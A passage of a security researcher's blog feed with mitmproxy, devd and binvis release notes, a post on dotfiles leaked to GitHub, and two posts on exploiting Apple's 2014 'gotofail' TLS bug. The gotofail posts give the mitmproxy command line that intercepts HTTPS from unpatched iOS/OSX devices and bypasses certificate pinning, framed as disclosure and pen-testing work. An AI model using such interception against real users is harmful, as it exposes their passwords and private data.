this sample are Google, YouTube, Github (not unexpectedly), and Twitter.</p> <p>Next up is the percentage of profiles with bookmarks for a given domain:</p> <figure> <img class="img-responsive center-block" src="./bookmarks.png"/> <figcaption class="text-center">Percentage of profiles with bookmarks for domain</figcaption> </figure> <p>Here, the top domains are those pre-seeded on install, particularly with Firefox. This explains the Mozilla domains as well as ubuntu.com, debian.org and launchpad.net. Once we're outside of this list, the "genuine destinations" match the cookie dataset quite well - YouTube, Github, Wikipedia, and so forth.</p> <h2 id="a-difficult-situation">A difficult situation</h2> <p>The surprise here is not that people accidentally check sensitive information into git repos. The real surprise is just how much of a pain in the butt it was to responsibly address the issue. At the end of this little experiment, I had more than 700 repositories that potentially contained sensitive, accidentally exposed user information. It beggars belief, but it's 2015 and the most popular repository hosting service in the world <a rel="external" href="https://github.com/isaacs/github/issues/37">has <strong>no way</strong> to privately report a bug against a repo</a>. One could create a public bug report for each repository in question - but that would be like hanging out a neon sign saying "privacy issue here" for others to find, particularly since bug reports are published in a user's activity stream.</p> <p>In the end, I decided to directly notify as many people as I could by email. So, I wrote a script that checked each affected user's profile for an email address. That left me with 120-odd users with contact details. I manually whittled these down to repositories that were obviously accidental checkins and sent them each an email, resulting in a dozen or so responses with variations on "oops, thanks for letting me know".</p> <h2 id="hey-github">Hey Github!</h2> <p>I have two recommendations for Github that would make this situation vastly, vastly better:</p> <ul> <li> <p>Add a mechanism that lets users report private bugs, visible only to the repo owners. There's just no excuse for the lack of a feature like this.</p> </li> <li> <p>Consider restricting search functionality somewhat. One option would be not to index dotfiles (.*) by default, and perhaps let users opt in to dotfile indexing on a per-repo basis. The vast majority of accidental checkins are either within dotfiles (shell history, for example), or within directories that start with leading dots (browser history, ssh config)</p> </li> </ul> <div class="footnote-definition" id="1"><sup class="footnote-definition-label">1</sup> <p>In fact, Github search path specifications seem to be broken now in a more general way, but that's beside the point for this post.</p> </div> devd v0.3 2015-11-12T00:00:00+00:00 2015-11-12T00:00:00+00:00 https://corte.si/posts/devd/0.3/ <div class="media"> <a href="https:&#x2F;&#x2F;github.com&#x2F;cortesi&#x2F;devd"> <img src="..&#x2F;intro&#x2F;devd-terminal.png" /> </a> </div> <p>I've just released <a rel="external" href="https://github.com/cortesi/devd/releases">devd 0.3</a> - a measured increment, with a modest set of bugfixes and new features. This is inline with my <a href="https://corte.si/posts/devd/0.2/">broad plan to keep devd a small, dependable, and focused tool.</a> Everyone should update.</p> <ul> <li>-s (--tls) Generate a self-signed certificate, and enable TLS. The cert bundle is stored in ~/.devd.cert</li> <li>Add the X-Forwarded-Host header to reverse proxied traffic.</li> <li>Disable upstream cert validation for reverse proxied traffic. This makes using self-signed certs for development easy. Devd shoudn't be used in contexts where this might pose a security risk.</li> <li>Bugfix: make CSS livereload work in Firefox</li> <li>Bugfix: make sure the Host header and SNI host matches for reverse proxied traffic.</li> </ul> mitmproxy: release v0.14 2015-11-07T00:00:00+00:00 2015-11-07T00:00:00+00:00 https://corte.si/posts/code/mitmproxy/announce_0_14/ <div class="media"> <a href="https:&#x2F;&#x2F;mitmproxy.org"> <img src="..&#x2F;announce_0_12_1&#x2F;mitmproxy_0_12_1.gif" /> </a> </div> <p>We've just released <a rel="external" href="http://www.mitmproxy.org">mitmproxy 0.14</a>! Since the last release, the project has had 399 commits by 13 contributors, resulting in 79 closed issues and 37 closed PRs, all of this in just over 100 days.</p> <ul> <li>Docs: Greatly updated docs <a rel="external" href="http://docs.mitmproxy.org">now hosted on ReadTheDocs</a></li> <li>Docs: Fixed Typos, updated URLs etc. (Nick Badger, Ben Lerner, Choongwoo Han, onlywade, Jurriaan Bremer)</li> <li>mitmdump: Colorized TTY output</li> <li>mitmdump: Use mitmproxy's content views for human-readable output (Chris Czub)</li> <li>mitmproxy and mitmdump: Support for displaying UTF8 contents</li> <li>mitmproxy: add command line switch to disable mouse interaction (Timothy Elliott)</li> <li>mitmproxy: bug fixes (Choongwoo Han, sethp-jive, FreeArtMan)</li> <li>mitmweb: bug fixes (Colin Bendell)</li> <li>libmproxy: Add ability to fall back to TCP passthrough for non-HTTP connections.</li> <li>libmproxy: Avoid double-connect in case of TLS Server Name Indication. This yields a massive speedup for TLS handshakes.</li> <li>libmproxy: Prevent unneccessary upstream connections (macmantrl)</li> <li>Inline Scripts: New <a rel="external" href="http://docs.mitmproxy.org/en/latest/dev/models.html#netlib.http.Headers">API for HTTP Headers</a></li> <li>Inline Scripts: Properly handle exceptions in <code>done</code> hook</li> <li>Inline Scripts: Allow relative imports, provide <code>__file__</code></li> <li>Examples: Add probabilistic TLS passthrough as an inline script</li> <li>netlib: Refactored HTTP protocol handling code</li> <li>netlib: ALPN support</li> <li>netlib: fixed a bug in the optional certificate verification.</li> <li>netlib: Initial Python 3.5 support (this is the first prerequisite for 3.x support in mitmproxy)</li> </ul> <p>I had very little time to spend on mitmproxy this cycle due to an extraordinarily busy patch at work - so, all of the above was shepherded into being by my hyper-efficient co-maintainer, <a rel="external" href="https://maximilianhils.com/">Maximilian Hils</a>. Having a steady pair of hands to keep things on track while I've been "absent" has been great. As a project, we'd also like to thank Google, who sponsored the work of <a rel="external" href="https://github.com/Kriechi">Thomas Kriechbaumer</a> under the <a rel="external" href="https://developers.google.com/open-source/soc/">Google Summer of Code</a> program, and the <a rel="external" href="https://www.honeynet.org/">Honeynet Project</a> under whose aegis the GSoC work was done. The excellent work Thomas has done on HTTP2 support and many, many other aspects of mitmproxy has been invaluable. Look for new releases building on this soon.</p> devd v0.2 (and some thoughts on small tools) 2015-11-05T00:00:00+00:00 2015-11-05T00:00:00+00:00 https://corte.si/posts/devd/0.2/ <p>I've just released <a rel="external" href="https://github.com/cortesi/devd/releases">version 0.2 of devd</a>, a local webserver for developers. This release contains a number of small improvement, and a few new features.</p> <ul> <li>-x (--exclude) flag to exclude files from livereload.</li> <li>-P (--password) flag for quick HTTP Basic password protection.</li> <li>-q (--quiet) flag to suppress all output from devd.</li> <li>Humanize file sizes in console logs.</li> <li>Improve directory indexes - better formatting, they now also livereload.</li> <li>Devd's built-in livereload URLs are now less likely to clash with user URLs.</li> <li>Internal 404 pages are now included in logs, timing measurement, and filtering.</li> <li>Improved heuristics for livereload file change detection. We now handle things like transient files created by editors better.</li> <li>A Linux ARM build will now be distributed with each release.</li> </ul> <p>Thanks to <a rel="external" href="http://brennie.ca">Barret Rennie</a>, <a rel="external" href="http://billmill.org">Bill Mill</a> and Judson Mitchell (<a href="mailto:[email protected]">[email protected]</a>) for contributing to this release.</p> <h1 id="some-thoughts-on-small-tools">Some thoughts on small tools</h1> <p>I love small, modest tools that do one thing well. I wrote devd partly out of nostalgia for <a rel="external" href="http://acme.com/software/thttpd/">thttpd</a>, a tiny web daemon that used to be my rough-and-ready, just-serve-files-now webserver for many years. It was a single, small binary that I could cross-compile for all the platforms I used, and it did its humble job well. Back in the day, it was one of the first things I put on every new box, along with my shell configuration and ssh keys. When it started showing its age, I moved on to the usual combination of built-in interpreter daemons (e.g. "python -m SimpleHTTPServer") and more heavy-handed tools, but not without a touch of sadness. Looking back on it now, it's clear that the thttpd I remember is a somewhat rose-tinted version of the real thing: thttpd actually did both more and less than I really needed. Devd strives to be a tool in the same sprit, that matches more closely what I want in my <a rel="external" href="https://en.wikipedia.org/wiki/Everyday_carry">EDC</a> http daemon. If people think of it as a small, dependable and unobtrusive part of their daily toolset, I'll have done <em>my</em> job well.</p> <p>This release includes a few new features for devd, and the next release will add a few more. Not long after that, I expect it to be more or less feature complete. It will continue to improve internally, and bugs will always be fixed, but it will never sprout the ability to run PHP or render less on the fly (both feature requests I've had since the first release). Instead, it will focus on doing the few things it does as well as it can: serve files, act as a reverse proxy tying development servers together, and live reload when files change.</p> devd: a web daemon for developers 2015-10-23T00:00:00+00:00 2015-10-23T00:00:00+00:00 https://corte.si/posts/devd/intro/ <p>I've just released <a rel="external" href="https://github.com/cortesi/devd">devd</a>, a small, self-contained, command-line-only HTTP server for developers. It started as a weekend stress-relief hack (that's a thing where I'm from), but has now become my preferred "daily driver" for most web-ish things. It's simple, direct and does more or less exactly what I need. This isn't terribly surprising, since I wrote it to scratch my own idiosyncratic itch - hopefully other, similarly itchy hackers will find it useful too.</p> <h2 id="quick-start">Quick start</h2> <p>Serve the current directory, open it in the browser (<strong>-o</strong>), and livereload when files change (<strong>-l</strong>):</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="shellscript"><span class="giallo-l"><span style="color: #6F42C1;">devd</span><span style="color: #005CC5;"> -ol</span><span style="color: #032F62;"> .</span></span></code></pre> <p>Reverse proxy to http://localhost:8080, and livereload when any file in the <strong>src</strong> directory changes:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="shellscript"><span class="giallo-l"><span style="color: #6F42C1;">devd</span><span style="color: #005CC5;"> -w</span><span style="color: #032F62;"> ./src http://localhost:8080</span></span></code></pre><h2 id="features">Features</h2> <h3 id="cross-platform-and-self-contained">Cross-platform and self-contained</h3> <p>Devd is a single statically compiled binary with no external dependencies, and is released for OSX, Linux and Windows. Don't want to install Node or Python in that light-weight Docker instance you're hacking in? Just copy over the devd binary and be done with it.</p> <h3 id="designed-for-the-terminal">Designed for the terminal</h3> <p>This means no config file, no daemonization, and logs that are designed to be read in the terminal by a developer. Logs are colorized and log entries span multiple lines. Devd's logs are detailed, warn about corner cases that other daemons ignore, and can optionally include things like detailed timing information and full headers.</p> <div class="media"> <a href="https:&#x2F;&#x2F;github.com&#x2F;cortesi&#x2F;devd"> <img src=".&#x2F;devd-terminal.png" /> </a> </div> <p>To make quickly firing up an instance as simple as possible, devd automatically chooses an open port to run on (unless it's specified), and can open a browser window pointing to the daemon root for you (the <strong>-o</strong> flag in the example above).</p> <h3 id="livereload">Livereload</h3> <p>When livereload is enabled, devd injects a small script into HTML pages, just before the closing <em>head</em> tag. The script listens for change notifications over a websocket connection, and reloads resources as needed. No browser addon is required, and livereload works even for reverse proxied apps. If only changes to CSS files are seen, devd will only reload external CSS resources, otherwise a full page reload is done. This serves the current directory with livereload enabled:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="shellscript"><span class="giallo-l"><span style="color: #6F42C1;">devd</span><span style="color: #005CC5;"> -l</span><span style="color: #032F62;"> .</span></span></code></pre> <p>You can also trigger livereload for files that are not being served, letting you reload reverse proxied applications when source files change. So, this command watches the <em>src</em> directory tree, and reverse proxies to a locally running application:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="shellscript"><span class="giallo-l"><span style="color: #6F42C1;">devd</span><span style="color: #005CC5;"> -w</span><span style="color: #032F62;"> ./src http://localhost:8888</span></span></code></pre><h3 id="reverse-proxy-static-file-server-flexible-routing">Reverse proxy + static file server + flexible routing</h3> <p>Modern apps tend to be collections of web servers, and devd caters for this with flexible reverse proxying. You can use devd to overlay a set of services on a single domain, add livereload to services that don't natively support it, add throttling and latency simulation to existing services, and so forth.</p> <p>Here's a more complicated example showing how all this ties together - it overlays two applications and a tree of static files. Livereload is enabled for the static files (<strong>-l</strong>) and also triggered whenever source files for reverse proxied apps change:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="shellscript"><span class="giallo-l"><span style="color: #6F42C1;">devd</span><span style="color: #005CC5;"> -l \</span></span> <span class="giallo-l"><span>-w</span><span style="color: #032F62;"> ./src/</span><span style="color: #005CC5;"> \</span></span> <span class="giallo-l"><span>/=http://localhost:8888</span><span style="color: #005CC5;"> \</span></span> <span class="giallo-l"><span>/api/=http://localhost:8889</span><span style="color: #005CC5;"> \</span></span> <span class="giallo-l"><span>/static/=./assets</span></span></code></pre><h3 id="light-weight-virtual-hosting">Light-weight virtual hosting</h3> <p>Devd uses a dedicated domain - <strong>devd.io</strong> - to do simple virtual hosting. This domain and all its subdomains resolves to 127.0.0.1, which we use to set up virtual hosting without any changes to <em>/etc/hosts</em> or other local configuration. Route specifications that don't start with a leading <strong>/</strong> are taken to be subdomains of <strong>devd.io</strong>. So, the following command serves a static site from devd.io, and reverse proxies a locally running app on api.devd.io:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="shellscript"><span class="giallo-l"><span style="color: #6F42C1;">devd</span><span style="color: #032F62;"> ./static api=http://localhost:8888</span></span></code></pre> <p>Check out the docs at <a rel="external" href="https://github.com/cortesi/devd">the Github repo</a> for the full route specification syntax.</p> <h3 id="latency-and-bandwidth-simulation">Latency and bandwidth simulation</h3> <p>Want to know what it's like to use your fancy 5mb HTML5 app from a mobile phone in Botswana? Look up the bandwidth and latency <a rel="external" href="http://www.cisco.com/c/en/us/solutions/collateral/service-provider/global-cloud-index-gci/CloudIndex_Supplement.html">here</a>, and invoke devd like so (making sure to convert from kilobits per second to kilobytes per second):</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="shellscript"><span class="giallo-l"><span style="color: #6F42C1;">devd</span><span style="color: #005CC5;"> -d 114 -u 51 -l 75</span><span style="color: #032F62;"> .</span></span></code></pre> <p>Devd tries to be reasonably accurate in simulating bandwidth and latency - it uses a token bucket implementation for throttling, properly handles concurrent requests, and chunks traffic up so data flow is smooth.</p> mitmproxy: release v0.13 2015-07-26T00:00:00+00:00 2015-07-26T00:00:00+00:00 https://corte.si/posts/code/mitmproxy/announce_0_13/ <div class="media"> <a href="..&#x2F;announce_0_12_1&#x2F;mitmproxy_0_12_1.gif"> <img src="..&#x2F;announce_0_12_1&#x2F;mitmproxy_0_12_1.gif" /> </a> </div> <p>This is a slightly late announcement of the release of <a rel="external" href="https://mitmproxy.org">mitmproxy v0.13</a>, which was pushed out the door earlier this week by my esteemed compatriots while I was tied up with other things. We have a number of big new features this time round. First, mitmproxy now has upstream certificate validation, thanks to the hard work of <a rel="external" href="https://github.com/kyle-m">Kyle Morton</a>. Mitmproxy is increasingly being used in user-oriented roles where upstream cert validation is crucial, so this is a welcome improvement. We also have a new transparent proxy mode, which uses the HTTP Host headers to detect the upstream server to connect to, rather than the OS NAT tables. This isn't accurate 100% of the time, but it's so convenient that having it in the base makes sense. Thanks to <a rel="external" href="https://github.com/ijiro123">Ijiro123</a>. Other improvements include include marking of flows in mitmproxy console (thanks to <a rel="external" href="https://github.com/drahosj">Jake Drahos</a>) and and an addition to the filter language allowing better matching of source and destination addresses (thanks to <a rel="external" href="https://github.com/isra17">Israel Halle</a>)</p> <p>This release also features something a bit more unusual: a removed feature. We added the ability to forward server certificates through to the client verbatim to allow mitmproxy to exploit the infamous <a rel="external" href="https://www.imperialviolet.org/2014/02/22/applebug.html">#gotofail</a> bug on IOS and OSX. We were one of the first (and perhaps THE first) publicly available mechanisms to exploit this issue, and pen testers, app reversers and curious folks everywhere rejoiced. Unfortunately, cert forwarding has become a support burden - for fiddly technical reasons, it adds a lot of complication to the way mitmproxy is distributed and installed. Since #gotofail is no longer so current, we've decided to remove support from mitmproxy. If you still have some vulnerable devices out there you need to muck with, the official answer at the moment is to install v0.12.</p> mitmproxy v0.12.1 2015-06-04T00:00:00+00:00 2015-06-04T00:00:00+00:00 https://corte.si/posts/code/mitmproxy/announce_0_12_1/ <div class="media"> <a href="mitmproxy_0_12_1.gif"> <img src="mitmproxy_0_12_1.gif" /> </a> </div> <p>I've just released <a rel="external" href="http://mitmproxy.org">mitmproxy v0.12.1</a>. This release fixes a few crashing bugs that slipped through in the previous iteration, so everyone should upgrade.</p> <p>Also included are a number of small improvements. The most noticeable of these is mouse interaction for mitmproxy console - the screen capture above shows me scrolling with my mouse, clicking to view a flow and switch tabs. We pay a small price for this - users now have to hold down a modifier key (shift on some systems, alt on others) to select text in the terminal for copying and pasting. To ease users into this, we've added a warning if we detect an attempt to select text without the right modifier key.</p> mitmproxy: release v0.12 and some project news 2015-05-26T00:00:00+00:00 2015-05-26T00:00:00+00:00 https://corte.si/posts/code/mitmproxy/announce_0_12/ <h2 id="project-news">Project News</h2> <p>Before we get to the new release, I'd like to give a quick update on some internal project developments.</p> <p>First up, after a somewhat involved process that included a couple of rounds of community voting and much discussion, we have a new logo:</p> <div class="media"> <a href="mitmproxy-long.png"> <img src="mitmproxy-long.png" /> </a> </div> <p>This will be rolled out in all the places where it makes sense along with the 0.12 release.</p> <p>Second, the long-dormant <a rel="external" href="http://twitter.com/mitmproxy">@mitmproxy</a> Twitter account is finally waking up. Please follow us there for mitmproxy project updates and related news.</p> <p>Third, we'd like to welcome <a rel="external" href="https://github.com/Kriechi">Thomas Kriechbaumer</a> to the project. Thomas is being sponsored to work on mitmproxy under the <a rel="external" href="https://developers.google.com/open-source/soc/">Google Summer of Code</a> program, and will be adding HTTP2 support - one of our most anticipated features. Special thanks goes to the <a rel="external" href="https://www.honeynet.org/">Honeynet Project</a> under whose aegis the GSoC work will be done.</p> <p>Lastly, a peek into the project's immediate future. We have websockets support on the way, thanks to a protocol contribution by <a rel="external" href="https://github.com/Chandler">Chandler Abraham</a>. We have HTTP2 on the way, thanks to Thomas. The mitmproxy web interface is gradually maturing behind the scenes, and should be ready to be unleashed on the world soon. And, of course, the project continues to improve quickly in almost every other respect. It's an exciting time, and there's a lot of interesting work to do - if you'd like to be involved, please get in touch.</p> <h2 id="mitmproxy-v0-12">mitmproxy v0.12</h2> <div class="media"> <a href="..&#x2F;announce0_9_1&#x2F;mitmproxy_0_9_1.png"> <img src="..&#x2F;announce0_9_1&#x2F;mitmproxy_0_9_1.png" /> </a> </div> <p>The most immediately visible change in v0.12 is a thorough overhaul of the console interface, which has been improved in almost every respect. Performance and responsiveness is better, keybindings have been consolidated, and options have been collected in a dedicated options screen (shortcut "o"). Palettes have been overhauled entirely, with improvements to the palettes themselves, the ability to change palettes on the fly, and support for non-transparent (mitmproxy sets the console background) and transparent (your emulator sets the console background) modes. The console application has also sprouted a powerful new cookie editor that will make tampering with cookie names and values more convenient.</p> <p>Other major features include official support for transparent mode on FreeBSD (thanks to <a rel="external" href="http://github.com/mike-pt">Mike C</a>), the ability to log TLS master keys for use with other tools like WireShark, support for creating flows from scratch in the console app (thanks <a rel="external" href="https://github.com/gato">Marcelo Glezer</a>). A thorough overhaul of the documentation is also under way - thanks to <a rel="external" href="https://github.com/elitest">Jim Shaver</a> for his work there.</p> <h2 id="pathod-v0-12">pathod v0.12</h2> <p>I'm also releasing pathod v0.12. The primary change here is the first phase of full support for websockets. At the moment, this is client-only - server support will follow in the next release.</p> <p>Here's a taster - the pathoc command below initiates a websocket connection to echo.websockets.org, then sends 10 websocket frames, each with a body of 100 random bytes.</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="shellscript"><span class="giallo-l"><span style="color: #D73A49;">&gt;</span><span> ./pathoc echo.websockets.org ws:/ wf:b@100:x10</span></span> <span class="giallo-l"><span style="color: #D73A49;">&gt;&gt;</span><span> ws:/</span></span> <span class="giallo-l"><span style="color: #D73A49;">&lt;&lt;</span><span style="color: #032F62;"> 200</span><span style="color: #6F42C1;"> OK:</span><span style="color: #005CC5;"> 225</span><span style="color: #032F62;"> bytes</span></span> <span class="giallo-l"><span style="color: #032F62;">&gt;&gt; wf:b@100:ir,@1</span></span></code></pre> <p>The usual range of injections and stream manipulations are available, and every aspect of the websocket frames can be manipulated in ways that creatively violate the specs. See the pathod documentation for the language definition.</p> binvis.io - a browser-based tool for visualising binary data 2015-03-04T00:00:00+00:00 2015-03-04T00:00:00+00:00 https://corte.si/posts/binvis/announce/ <p>Over the years, I've written a number of posts on this blog on the topic of binary data visualisation. I looked at <a href="https://corte.si/posts/visualisation/binvis/">using space-filling curves to understand the structure of binary data</a>, I've showed how <a href="https://corte.si/posts/visualisation/entropy/">entropy visualisation lets you trivially pick out compressed and encrypted sections</a>, and I've drawn <a href="https://corte.si/posts/visualisation/malware/">pretty pictures of malware</a>. Unfortunately the tools I wrote (<a rel="external" href="https://github.com/cortesi/scurve">code here</a>) all produced static images, which made making practical use a pain. You really need interactivity to be able to combine visual exploration with inspection of the actual underlying data, and to let you easily export interesting sections.</p> <h2 id="binvis-io"><a rel="external" href="http://binvis.io">binvis.io</a></h2> <p>l recently started toying with the idea of using web technologies to build an interactive visualiser of this sort. One thing led to another... and today, I'm happy to announce a first draft of the idea: binvis.io</p> <div class="media"> <a href="http:&#x2F;&#x2F;binvis.io&#x2F;#&#x2F;view&#x2F;examples&#x2F;elf-Linux-ARMv7-ls.bin?colors=entropy"> <img src="binvis.png" /> </a> </div> <p>With binvis.io you can:</p> <ul> <li>Visually explore binary data</li> <li>Cluster bytes to pick out fine structural features with space-filling curves</li> <li>Use the simple scan layout to navigate and select data intuitively</li> <li>Flip between a number of useful byte color mappings, including an entropy visualiser that lets you pick out compressed or encrypted sections</li> <li>Export data segments for analysis</li> </ul> <h2 id="next-steps">Next steps</h2> <p>Right now, Binvis is local only - that is, when you open a file, all analysis is done in your browser and nothing is sent to the server. In the longer term, I'd like to add the ability to upload, share and annotate binaries, both publicly and privately. There is probably a market of... oh, at least a dozen people out there who would have use for an imgur-like sharing system for binaries. Fame and riches surely await. Of course, there are also an immense number of other improvements to be made to almost every aspect of binvis, ranging from speed, to better colour schemes, to improvements in interaction and UX.</p> <p>The todo list is long, and time is short, so I'm looking for serious collaborators. If you're interested, drop me a line!</p> <h2 id="thanks">Thanks</h2> <p>Binvis isn't the first interactive binary visualisation tool of this sort. A few others that spring to mind are <a rel="external" href="https://sites.google.com/site/xxcantorxdustxx/about">..cantor.dust</a>, <a rel="external" href="https://github.com/joesavage/binspect">bininspect</a> and <a rel="external" href="https://github.com/wapiflapi/binglide">binglide</a>. I'm trying to learn from these precursors, and I'm delighted to see that they all also drew, to a greater or lesser extent, on my earlier work. Thus the eternal cycle of code rolls on.</p> <p>I'd like to particularly thank <a rel="external" href="http://www.rumint.org/gregconti/">Greg Conti</a> for letting me re-use the name of <a rel="external" href="https://code.google.com/p/binvis/">his own, much earlier visualisation tool</a>, for publishing a fascinating series of <a rel="external" href="http://www.rumint.org/gregconti/publications/taxonomy-bh.pdf">papers</a> and <a rel="external" href="https://vimeo.com/15633207">talks</a> on the topic, and for providing feedback both on this particular incarnation of the idea as well as my earlier dabblings.</p> mitmproxy 0.11.2 2014-12-29T00:00:00+00:00 2014-12-29T00:00:00+00:00 https://corte.si/posts/code/mitmproxy/announce_0_11_2/ <div class="media"> <a href="..&#x2F;announce0_9_1&#x2F;mitmproxy_0_9_1.png"> <img src="..&#x2F;announce0_9_1&#x2F;mitmproxy_0_9_1.png" /> </a> </div> <p>I've just pushed <a rel="external" href="http://mitmproxy.org">mitmproxy v0.11.2</a> out the door. This is primarily a bugfix release, but does have one very useful new feature: configuration files. All options available through command-line flags can now be set persistently in config files, for all the tools - <a rel="external" href="http://mitmproxy.org/doc/config.html">see the documentation for more</a>. Adding this was made much easier by <a rel="external" href="https://github.com/zorro3/ConfigArgParse">ConfigArgParse</a>, one of those small Python project gems that you feel more people should know about. Check it out.</p> <p>This release also features the usual array of bugfixes and small improvements. In particular, we know handle upstream servers that knock back connections without SNI better, and the onboarding app now works in the OSX binary builds. Everyone should update.</p> mitmproxy and pathod 0.11 2014-11-07T00:00:00+00:00 2014-11-07T00:00:00+00:00 https://corte.si/posts/code/mitmproxy/announce_0_11/ <div class="media"> <a href="..&#x2F;announce0_9_1&#x2F;mitmproxy_0_9_1.png"> <img src="..&#x2F;announce0_9_1&#x2F;mitmproxy_0_9_1.png" /> </a> </div> <p>I'm happy to announce that we've just released v0.11 of both <a rel="external" href="http://mitmproxy.org">mitmproxy</a> and <a rel="external" href="http://pathod.net">pathod</a>. This release features a huge revamp of mitmproxy's internals and a long list of important features. Pathod has much improved SSL support and fuzzing.</p> <p>Our thanks to the many testers and [contributors](https: //github.com/mitmproxy/mitmproxy/blob/master/CONTRIBUTORS) that helped get this out the door. Please lodge bug reports and feature requests <a rel="external" href="https://github.com/mitmproxy/mitmproxy/issues">here</a>.</p> <h2 id="mitmproxy-changelog">Mitmproxy Changelog</h2> <ul> <li>Performance improvements for mitmproxy console</li> <li>SOCKS5 proxy mode allows mitmproxy to act as a SOCKS5 proxy server</li> <li>Data streaming for response bodies exceeding a threshold ([email protected])</li> <li>Ignore hosts or IP addresses, forwarding both HTTP and HTTPS traffic untouched</li> <li>Finer-grained control of traffic replay, including options to ignore contents or parameters when matching flows ([email protected])</li> <li>Pass arguments to inline scripts</li> <li>Configurable size limit on HTTP request and response bodies</li> <li>Per-domain specification of interception certificates and keys (see --cert option)</li> <li>Certificate forwarding, relaying upstream SSL certificates verbatim (see --cert-forward)</li> <li>Search and highlighting for HTTP request and response bodies in mitmproxy console ([email protected])</li> <li>Transparent proxy support on Windows</li> <li>Improved error messages and logging</li> <li>Support for FreeBSD in transparent mode, using pf ([email protected])</li> <li>Content view mode for WBXML ([email protected])</li> <li>Better documentation, with a new section on proxy modes</li> <li>Generic TCP proxy mode</li> <li>Countless bugfixes and other small improvements</li> </ul> <h2 id="pathod-changelog">Pathod Changelog</h2> <ul> <li>Hugely improved SSL support, including dynamic generation of certificates using the mitproxy cacert</li> <li>pathoc -S dumps information on the remote SSL certificate chain</li> <li>Big improvements to fuzzing, including random spec selection and memoization to avoid repeating randomly generated patterns</li> <li>Reflected patterns, allowing you to embed a pathod server response specification in a pathoc request, resolving both on client side. This makes fuzzing proxies and other intermediate systems much better.</li> </ul> mitmproxy now supports #gotofail 2014-03-11T00:00:00+00:00 2014-03-11T00:00:00+00:00 https://corte.si/posts/security/gotofail-mitmproxy/ <p>A few weeks ago, I posted that I had hacked up <a href="https://corte.si/posts/security/cve-2014-1266/">a version of mitmproxy that exploited CVE-2014-1266</a>, giving unrestricted access to nearly all HTTPS traffic on affected IOS and OSX devices. I chose not to release working code at the time, but a number of <a rel="external" href="https://github.com/gabrielg/CVE-2014-1266-poc">POCs</a> have been floating about publicly almost since the issue was first discovered. So, the time has come to publish - as of yesterday, <a rel="external" href="https://github.com/mitmproxy/mitmproxy">mitmproxy's master branch</a> supports #gotofail.</p> <p>To see the exploit in action, invoke mitmproxy as follows:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="shellscript"><span class="giallo-l"><span style="color: #6F42C1;">mitmproxy</span><span style="color: #005CC5;"> --ciphers=</span><span style="color: #032F62;">&quot;DHE-RSA-AES256-SHA&quot;</span><span style="color: #005CC5;"> --cert-forward</span></span></code></pre> <p>After configuring your device proxy, you should see something like this screenshot, which shows off interception of miscellaneous iTunes traffic:</p> <div class="media"> <a href=".&#x2F;gotofail-mitmproxy.png"> <img src=".&#x2F;gotofail-mitmproxy.png" /> </a> </div> <p>Note that the client device here has no mitmproxy CA certificate installed, and we get circumvention of certificate pinning "for free".</p> <p>Two new options make the magic work. The <strong>--ciphers</strong> option specifies which SSL ciphers we should expose to connecting clients. In this case, we force the client to use a DHE cipher, which is required to trigger the issue. The <strong>--cert-forward</strong> option tells mitmproxy to pass upstream SSL certificates down to the client unmodified. Usually we'd expect this to fail, since the upstream certs won't match mitmproxy's private key. In this case #gotofail means the client fails to properly execute the check, letting us pass certificates through to the client verbatim as if we owned them.</p> <p>There's one additional wrinkle that mitmproxy smooths over - before we can get the mismatching certificate and key to the client, OpenSSL itself has to be coaxed into accepting them. The first version of my exploit involved a patch to OpenSSL to remove the library's own consistency check, but this is inconvenient. Luckily it turns out that we can <a rel="external" href="https://github.com/mitmproxy/netlib/blob/master/netlib/certffi.py">munge an obscure flag</a> in the RSA data-structures to circumvent this, which allows us to exploit #gotofail in pure Python.</p> <p>The moment I got this exploit working, I marched upstairs and confiscated my wife's un-updated iPhone 5 to add it to my pool of test devices (never fear - it's been replaced with a nice new 5S). Devices running IOS of the right vintage have suddenly become the gold standard for analysis and pen testing. This beautiful vulnerability lets us circumvent SSL effortlessly, completely sidestepping certificate pinning for all the applications I've tried, without any <a rel="external" href="https://github.com/iSECPartners/ios-ssl-kill-switch">cumbersome and invasive interference with the device</a>. Combine this with the fact that these same devices also have an un-tethered jailbreak, and I think it's unlikely that we'll ever have an analysis platform this nice again. So, stockpile your IOS 7.0.6 devices now, and intercept all the things.</p> Exploiting CVE-2014-1266 with mitmproxy 2014-02-25T00:00:00+00:00 2014-02-25T00:00:00+00:00 https://corte.si/posts/security/cve-2014-1266/ <p>This post is a quick recap of work I've been discussing on Twitter in the last few hours. I've just finished putting together a version of <a rel="external" href="http://mitmproxy.org">mitmproxy</a> that takes advantage of <a rel="external" href="http://support.apple.com/kb/HT6147">CVE-2014-1266</a>, Apple's <a rel="external" href="https://www.imperialviolet.org/2014/02/22/applebug.html">critical SSL/TLS bug</a>. We knew in theory that the issue should give access to all SSL traffic using Apple's broken implementation - I can now report that this is also true in practice.</p> <p>I've confirmed full transparent interception of HTTPS traffic on both IOS (prior to 7.0.6) and OSX Mavericks. Nearly all encrypted traffic, including usernames, passwords, and even Apple app updates can be captured. This includes:</p> <ul> <li>App store and software update traffic</li> <li>iCloud data, including KeyChain enrollment and updates</li> <li>Data from the Calendar and Reminders</li> <li>Find My Mac updates</li> <li>Traffic for applications that use certificate pinning, like Twitter</li> </ul> <p>It's difficult to over-state the seriousness of this issue. With a tool like mitmproxy in the right position, an attacker can intercept, view and modify nearly all sensitive traffic. This extends to the software update mechanism itself, which uses HTTPS for deployment.</p> <p>At the time of writing, Apple still doesn't have a fix deployed for OSX. It took less than a day to get the patched version of mitmproxy and its supporting libraries up and running. I won't be releasing my patches until well after Apple's pending update, but it's safe to assume that this is now being exploited in the wild. Of course, intelligence agencies have no doubt been on top of this for some time - perhaps some of the <a rel="external" href="http://news.yahoo.com/security-expert-calls-nbc-whiny-report-sochi-olympics-003047841.html">inflammatory Sochi security horror stories</a> were plausible after all.</p> mitmproxy and pathod 0.10 2014-01-29T00:00:00+00:00 2014-01-29T00:00:00+00:00 